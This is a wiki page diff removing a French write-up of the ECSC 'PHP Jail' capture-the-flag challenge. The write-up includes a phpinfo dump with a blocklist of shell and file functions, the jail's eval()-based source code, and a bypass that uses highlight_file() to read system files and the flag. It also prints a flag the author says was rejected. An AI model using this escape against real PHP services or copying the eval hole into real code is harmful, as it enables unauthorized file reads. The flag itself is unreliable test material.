Differences

This shows you the differences between two versions of the page.

--- challenges-anssi-ecsc-misc-php-jail [2019/05/21 01:13] – didzkovitchz
+++ challenges-anssi-ecsc-misc-php-jail [2020/12/15 21:09] (current) – removed didzkovitchz
@@ Line 1: / Line 1: @@
-====== ANSSI ECSC ~~ Challenges misc ~~ PHP Jail ======
-[[anssi-ecsc|Retour]]
--
-===== Présentation =====
-<code>
-Saurez-vous sortir de cette prison PHP pour retrouver le fichier flag présent sur le système ?
-nc challenges.ecsc-teamfrance.fr 4002
-</code>
-//Pas de fichier//
--
-===== 1 - Connexion =====
-<code>
-nc challenges.ecsc-teamfrance.fr 4002
-    /// PHP JAIL ////
-    There's a file named flag on this filesystem.
-    Find it.
-    Read it.
-    Flag it.
-Enter your command:
-Too slow!
-Bye!
-</code>
-===== 2 - Analyse =====
-Après quelques recherches, je suis tombé sur l'article suivant qui m'a beaucoup aidé : [[http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/]]
-La commande ''phpinfo();'' m'a retourné beaucoup d'informations, dont ''disable_functions'' ainsi que le nom du script et quelques autres informations.
-<code>
-phpinfo()
-PHP Version => 7.0.33-0+deb9u3
-System => Linux phpjail 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64
-Build Date => Mar  8 2019 10:01:24
-Server API => Command Line Interface
-Virtual Directory Support => disabled
-Configuration File (php.ini) Path => /etc/php/7.0/cli
-Loaded Configuration File => /etc/php/7.0/cli/php.ini
-Scan this dir for additional .ini files => /etc/php/7.0/cli/conf.d
-Additional .ini files parsed => /etc/php/7.0/cli/conf.d/10-opcache.ini,
-/etc/php/7.0/cli/conf.d/10-pdo.ini,
-/etc/php/7.0/cli/conf.d/20-calendar.ini,
-/etc/php/7.0/cli/conf.d/20-ctype.ini,
-/etc/php/7.0/cli/conf.d/20-exif.ini,
-/etc/php/7.0/cli/conf.d/20-fileinfo.ini,
-/etc/php/7.0/cli/conf.d/20-ftp.ini,
-/etc/php/7.0/cli/conf.d/20-gettext.ini,
-/etc/php/7.0/cli/conf.d/20-iconv.ini,
-/etc/php/7.0/cli/conf.d/20-json.ini,
-/etc/php/7.0/cli/conf.d/20-phar.ini,
-/etc/php/7.0/cli/conf.d/20-posix.ini,
-/etc/php/7.0/cli/conf.d/20-readline.ini,
-/etc/php/7.0/cli/conf.d/20-shmop.ini,
-/etc/php/7.0/cli/conf.d/20-sockets.ini,
-/etc/php/7.0/cli/conf.d/20-sysvmsg.ini,
-/etc/php/7.0/cli/conf.d/20-sysvsem.ini,
-/etc/php/7.0/cli/conf.d/20-sysvshm.ini,
-/etc/php/7.0/cli/conf.d/20-tokenizer.ini
-PHP API => 20151012
-PHP Extension => 20151012
-Zend Extension => 320151012
-Zend Extension Build => API320151012,NTS
-PHP Extension Build => API20151012,NTS
-Debug Build => no
-Thread Safety => disabled
-Zend Signal Handling => disabled
-Zend Memory Manager => enabled
-Zend Multibyte Support => disabled
-IPv6 Support => enabled
-DTrace Support => available, disabled
-Registered PHP Streams => https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar
-Registered Stream Socket Transports => tcp, udp, unix, udg, ssl, sslv2, tls, tlsv1.0, tlsv1.1, tlsv1.2
-Registered Stream Filters => zlib.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, convert.iconv.*
-This program makes use of the Zend Scripting Language Engine:
-Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
-    with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies
- _______________________________________________________________________
-Configuration
-calendar
-Calendar support => enabled
-Core
-PHP Version => 7.0.33-0+deb9u3
-Directive => Local Value => Master Value
-allow_url_fopen => Off => Off
-allow_url_include => Off => Off
-arg_separator.input => & => &
-arg_separator.output => & => &
-auto_append_file => no value => no value
-auto_globals_jit => On => On
-auto_prepend_file => no value => no value
-browscap => no value => no value
-default_charset => UTF-8 => UTF-8
-default_mimetype => text/html => text/html
-disable_classes => Directory, DirectoryIterator, FilesystemIterator, GlobIterator, RecursiveDirectoryIterator, SplFileObject, SplFileInfo => Directory, DirectoryIterator, FilesystemIterator, GlobIterator, RecursiveDirectoryIterator, SplFileObject, SplFileInfo
-disable_functions => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir
-display_errors => Off => Off
-display_startup_errors => Off => Off
-doc_root => no value => no value
-docref_ext => no value => no value
-docref_root => no value => no value
-enable_dl => Off => Off
-enable_post_data_reading => On => On
-error_append_string => no value => no value
-error_log => /var/log/php_errors.log => /var/log/php_errors.log
-error_prepend_string => no value => no value
-error_reporting => 0 => 0
-exit_on_timeout => Off => Off
-expose_php => Off => Off
-extension_dir => /usr/lib/php/20151012 => /usr/lib/php/20151012
-file_uploads => Off => Off
-highlight.comment => <font style="color: #FF8000">#FF8000</font> => <font style="color: #FF8000">#FF8000</font>
-highlight.default => <font style="color: #0000BB">#0000BB</font> => <font style="color: #0000BB">#0000BB</font>
-highlight.html => <font style="color: #000000">#000000</font> => <font style="color: #000000">#000000</font>
-highlight.keyword => <font style="color: #007700">#007700</font> => <font style="color: #007700">#007700</font>
-highlight.string => <font style="color: #DD0000">#DD0000</font> => <font style="color: #DD0000">#DD0000</font>
-html_errors => Off => Off
-ignore_repeated_errors => Off => Off
-ignore_repeated_source => Off => Off
-ignore_user_abort => Off => Off
-implicit_flush => On => On
-include_path => .:/usr/share/php => .:/usr/share/php
-input_encoding => no value => no value
-internal_encoding => no value => no value
-log_errors => On => On
-log_errors_max_len => 1024 => 1024
-mail.add_x_header => On => On
-mail.force_extra_parameters => no value => no value
-mail.log => no value => no value
-max_execution_time => 0 => 0
-max_file_uploads => 20 => 20
-max_input_nesting_level => 64 => 64
-max_input_time => -1 => -1
-max_input_vars => 1000 => 1000
-memory_limit => -1 => -1
-open_basedir => no value => no value
-output_buffering => 0 => 0
-output_encoding => no value => no value
-output_handler => no value => no value
-post_max_size => 8M => 8M
-precision => 14 => 14
-realpath_cache_size => 4096K => 4096K
-realpath_cache_ttl => 120 => 120
-register_argc_argv => On => On
-report_memleaks => On => On
-report_zend_debug => Off => Off
-request_order => GP => GP
-sendmail_from => no value => no value
-sendmail_path => /usr/sbin/sendmail -t -i  => /usr/sbin/sendmail -t -i
-serialize_precision => 17 => 17
-short_open_tag => Off => Off
-SMTP => localhost => localhost
-smtp_port => 25 => 25
-sql.safe_mode => Off => Off
-sys_temp_dir => no value => no value
-track_errors => Off => Off
-unserialize_callback_func => no value => no value
-upload_max_filesize => 2M => 2M
-upload_tmp_dir => no value => no value
-user_dir => no value => no value
-user_ini.cache_ttl => 300 => 300
-user_ini.filename => .user.ini => .user.ini
-variables_order => GPCS => GPCS
-xmlrpc_error_number => 0 => 0
-xmlrpc_errors => Off => Off
-zend.assertions => -1 => -1
-zend.detect_unicode => On => On
-zend.enable_gc => On => On
-zend.multibyte => Off => Off
-zend.script_encoding => no value => no value
-ctype
-ctype functions => enabled
-date
-date/time support => enabled
-timelib version => 2016.02
-"Olson" Timezone Database Version => 0.system
-Timezone Database => internal
-Default timezone => Europe/Berlin
-Directive => Local Value => Master Value
-date.default_latitude => 31.7667 => 31.7667
-date.default_longitude => 35.2333 => 35.2333
-date.sunrise_zenith => 90.583333 => 90.583333
-date.sunset_zenith => 90.583333 => 90.583333
-date.timezone => no value => no value
-exif
-EXIF Support => enabled
-EXIF Version => 7.0.33-0+deb9u3
-Supported EXIF Version => 0220
-Supported filetypes => JPEG,TIFF
-Directive => Local Value => Master Value
-exif.decode_jis_intel => JIS => JIS
-exif.decode_jis_motorola => JIS => JIS
-exif.decode_unicode_intel => UCS-2LE => UCS-2LE
-exif.decode_unicode_motorola => UCS-2BE => UCS-2BE
-exif.encode_jis => no value => no value
-exif.encode_unicode => ISO-8859-15 => ISO-8859-15
-fileinfo
-fileinfo support => enabled
-version => 1.0.5
-libmagic => 522
-filter
-Input Validation and Filtering => enabled
-Revision => $Id: 28fcca4bfda9c9907588a64d245b49cb398249d8 $
-Directive => Local Value => Master Value
-filter.default => unsafe_raw => unsafe_raw
-filter.default_flags => no value => no value
-ftp
-FTP support => enabled
-FTPS support => enabled
-gettext
-GetText Support => enabled
-hash
-hash support => enabled
-Hashing Engines => md2 md4 md5 sha1 sha224 sha256 sha384 sha512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
-MHASH support => Enabled
-MHASH API Version => Emulated Support
-iconv
-iconv support => enabled
-iconv implementation => glibc
-iconv library version => 2.24
-Directive => Local Value => Master Value
-iconv.input_encoding => no value => no value
-iconv.internal_encoding => no value => no value
-iconv.output_encoding => no value => no value
-json
-json support => enabled
-json version => 1.4.0
-libxml
-libXML support => active
-libXML Compiled Version => 2.9.4
-libXML Loaded Version => 20904
-libXML streams => enabled
-openssl
-OpenSSL support => enabled
-OpenSSL Library Version => OpenSSL 1.1.0j  20 Nov 2018
-OpenSSL Header Version => OpenSSL 1.1.0j  20 Nov 2018
-Openssl default config => /usr/lib/ssl/openssl.cnf
-Directive => Local Value => Master Value
-openssl.cafile => no value => no value
-openssl.capath => no value => no value
-pcntl
-pcntl support => enabled
-pcre
-PCRE (Perl Compatible Regular Expressions) Support => enabled
-PCRE Library Version => 8.39 2016-06-14
-PCRE JIT Support => enabled
-Directive => Local Value => Master Value
-pcre.backtrack_limit => 1000000 => 1000000
-pcre.jit => 1 => 1
-pcre.recursion_limit => 100000 => 100000
-PDO
-PDO support => enabled
-PDO drivers =>
-Phar
-Phar: PHP Archive support => enabled
-Phar EXT version => 2.0.2
-Phar API version => 1.1.1
-SVN revision => $Id: 308c1e92e8ad12e51f5db846d3366fdf3487eb21 $
-Phar-based phar archives => enabled
-Tar-based phar archives => enabled
-ZIP-based phar archives => enabled
-gzip compression => enabled
-bzip2 compression => disabled (install pecl/bz2)
-Native OpenSSL support => enabled
-Phar based on pear/PHP_Archive, original concept by Davey Shafik.
-Phar fully realized by Gregory Beaver and Marcus Boerger.
-Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.
-Directive => Local Value => Master Value
-phar.cache_list => no value => no value
-phar.readonly => On => On
-phar.require_hash => On => On
-posix
-Revision => $Id: b691ca925e7a085e6929579c4eba8fed0732e0ef $
-readline
-Readline Support => enabled
-Readline library => EditLine wrapper
-Directive => Local Value => Master Value
-cli.pager => no value => no value
-cli.prompt => \b \>  => \b \>
-Reflection
-Reflection => enabled
-Version => $Id: e5303663dcb329e17818853ff223e5ee01481f2c $
-session
-Session Support => enabled
-Registered save handlers => files user
-Registered serializer handlers => php_serialize php php_binary
-Directive => Local Value => Master Value
-session.auto_start => Off => Off
-session.cache_expire => 180 => 180
-session.cache_limiter => nocache => nocache
-session.cookie_domain => no value => no value
-session.cookie_httponly => Off => Off
-session.cookie_lifetime => 0 => 0
-session.cookie_path => / => /
-session.cookie_secure => Off => Off
-session.entropy_file => /dev/urandom => /dev/urandom
-session.entropy_length => 32 => 32
-session.gc_divisor => 1000 => 1000
-session.gc_maxlifetime => 1440 => 1440
-session.gc_probability => 0 => 0
-session.hash_bits_per_character => 5 => 5
-session.hash_function => 0 => 0
-session.lazy_write => On => On
-session.name => PHPSESSID => PHPSESSID
-session.referer_check => no value => no value
-session.save_handler => files => files
-session.save_path => /var/lib/php/sessions => /var/lib/php/sessions
-session.serialize_handler => php => php
-session.upload_progress.cleanup => On => On
-session.upload_progress.enabled => On => On
-session.upload_progress.freq => 1% => 1%
-session.upload_progress.min_freq => 1 => 1
-session.upload_progress.name => PHP_SESSION_UPLOAD_PROGRESS => PHP_SESSION_UPLOAD_PROGRESS
-session.upload_progress.prefix => upload_progress_ => upload_progress_
-session.use_cookies => On => On
-session.use_only_cookies => On => On
-session.use_strict_mode => Off => Off
-session.use_trans_sid => 0 => 0
-shmop
-shmop support => enabled
-sockets
-Sockets Support => enabled
-SPL
-SPL support => enabled
-Interfaces => Countable, OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject
-Classes => AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException
-standard
-Dynamic Library Support => enabled
-Path to sendmail => /usr/sbin/sendmail -t -i
-Directive => Local Value => Master Value
-assert.active => 1 => 1
-assert.bail => 0 => 0
-assert.callback => no value => no value
-assert.exception => 0 => 0
-assert.quiet_eval => 0 => 0
-assert.warning => 1 => 1
-auto_detect_line_endings => 0 => 0
-default_socket_timeout => 60 => 60
-from => no value => no value
-url_rewriter.tags => a=href,area=href,frame=src,input=src,form=fakeentry => a=href,area=href,frame=src,input=src,form=fakeentry
-user_agent => no value => no value
-sysvmsg
-sysvmsg support => enabled
-Revision => $Id: dfb999763f95bfe9609fae60b4e07a492888ec7c $
-sysvsem
-Version => 7.0.33-0+deb9u3
-sysvshm
-Version => 7.0.33-0+deb9u3
-tokenizer
-Tokenizer Support => enabled
-Zend OPcache
-Opcode Caching => Disabled
-Optimization => Disabled
-SHM Cache => Enabled
-File Cache => Disabled
-Startup Failed => Opcode Caching is disabled for CLI
-Directive => Local Value => Master Value
-opcache.blacklist_filename => no value => no value
-opcache.consistency_checks => 0 => 0
-opcache.dups_fix => Off => Off
-opcache.enable => On => On
-opcache.enable_cli => Off => Off
-opcache.enable_file_override => Off => Off
-opcache.error_log => no value => no value
-opcache.fast_shutdown => 0 => 0
-opcache.file_cache => no value => no value
-opcache.file_cache_consistency_checks => 1 => 1
-opcache.file_cache_only => 0 => 0
-opcache.file_update_protection => 2 => 2
-opcache.force_restart_timeout => 180 => 180
-opcache.huge_code_pages => Off => Off
-opcache.inherited_hack => On => On
-opcache.interned_strings_buffer => 4 => 4
-opcache.lockfile_path => /tmp => /tmp
-opcache.log_verbosity_level => 1 => 1
-opcache.max_accelerated_files => 2000 => 2000
-opcache.max_file_size => 0 => 0
-opcache.max_wasted_percentage => 5 => 5
-opcache.memory_consumption => 64 => 64
-opcache.optimization_level => 0x7FFFBFFF => 0x7FFFBFFF
-opcache.preferred_memory_model => no value => no value
-opcache.protect_memory => 0 => 0
-opcache.restrict_api => no value => no value
-opcache.revalidate_freq => 2 => 2
-opcache.revalidate_path => Off => Off
-opcache.save_comments => 1 => 1
-opcache.use_cwd => On => On
-opcache.validate_permission => Off => Off
-opcache.validate_root => Off => Off
-opcache.validate_timestamps => On => On
-zlib
-ZLib Support => enabled
-Stream Wrapper => compress.zlib://
-Stream Filter => zlib.inflate, zlib.deflate
-Compiled Version => 1.2.8
-Linked Version => 1.2.8
-Directive => Local Value => Master Value
-zlib.output_compression => Off => Off
-zlib.output_compression_level => -1 => -1
-zlib.output_handler => no value => no value
-Additional Modules
-Module Name
-Environment
-Variable => Value
-USERNAME => user0
-SUDO_COMMAND => /usr/bin/python /home/user0/server.py
-TERM => linux
-SHELL => /bin/zsh
-HOSTNAME => phpjail
-SUDO_UID => 0
-SUDO_GID => 0
-LOGNAME => user0
-USER => user0
-PATH => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-MAIL => /var/mail/user0
-SUDO_USER => root
-HOME => /home/user0
-PHP Variables
-Variable => Value
-$_SERVER['USERNAME'] => user0
-$_SERVER['SUDO_COMMAND'] => /usr/bin/python /home/user0/server.py
-$_SERVER['TERM'] => linux
-$_SERVER['SHELL'] => /bin/zsh
-$_SERVER['HOSTNAME'] => phpjail
-$_SERVER['SUDO_UID'] => 0
-$_SERVER['SUDO_GID'] => 0
-$_SERVER['LOGNAME'] => user0
-$_SERVER['USER'] => user0
-$_SERVER['PATH'] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-$_SERVER['MAIL'] => /var/mail/user0
-$_SERVER['SUDO_USER'] => root
-$_SERVER['HOME'] => /home/user0
-$_SERVER['PHP_SELF'] => /home/user0/main.php
-$_SERVER['SCRIPT_NAME'] => /home/user0/main.php
-$_SERVER['SCRIPT_FILENAME'] => /home/user0/main.php
-$_SERVER['PATH_TRANSLATED'] => /home/user0/main.php
-$_SERVER['DOCUMENT_ROOT'] =>
-$_SERVER['REQUEST_TIME_FLOAT'] => 1558366469.9093
-$_SERVER['REQUEST_TIME'] => 1558366469
-$_SERVER['argv'] => Array
-(
-    [0] => /home/user0/main.php
-)
-$_SERVER['argc'] => 1
-PHP License
-This program is free software; you can redistribute it and/or modify
-it under the terms of the PHP License as published by the PHP Group
-and included in the distribution in the file:  LICENSE
-This program is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
-If you did not receive a copy of the PHP license, or have any
-questions about PHP licensing, please contact license@php.net.
-</code>
-Je ne suis pas habitué des jails PHP, donc j'ai cherché un peu et puis j'ai trouvé 2 fonctions PHP bien utiles pour m'aider : ''highlight_file()'' et ''is_file()'' ; ces fonctions ne sont pas dans la "blacklist".
-J'ai ainsi pu obtenir le contenu du fichier ''/home/user0/main.php'' (script lancé) :
-<code>
-<?php
-//ini_set('display_errors', 'off');
-//ini_set('error_reporting', '');
-//ini_set('max_execution_time', 10);
-echo "Enter your command: "; $command = readline();
-try {
-    @eval('fclose(STDERR); '.$command);
-} catch (ParseError $e) {
-    die('Parse error, or something.');
-}
-?>
-</code>
-J'ai aussi regardé le contenu du fichier ''/home/user0/server.py'' mais ça ne m'a rien apporté, idem pour ''/etc/passwd''.
-Un ''echo(is_file('/tmp/flag'));'' m'a permis d'identifier la présence du fichier ''flag'' dans ''/tmp'' (endroit le + probable).
-Enfin le Graal : ''highlight_file('/tmp/flag');''
-<code>
-<span style="color: #000000">
-ECSC{8b63211197414118f6f9dcec6dead359002705c5}</span>
-</code>
-===== 3 - FLAG =====
-Le flag que j'ai trouvé est donc ''ECSC{8b63211197414118f6f9dcec6dead359002705c5}'' mais lorsque je le saisis sur l'interface web du concours, j'ai le message "INCORRECT".
-Il n'y a pourtant aucun caractère étrange ni rien à priori dans ce que j'ai copié/collé...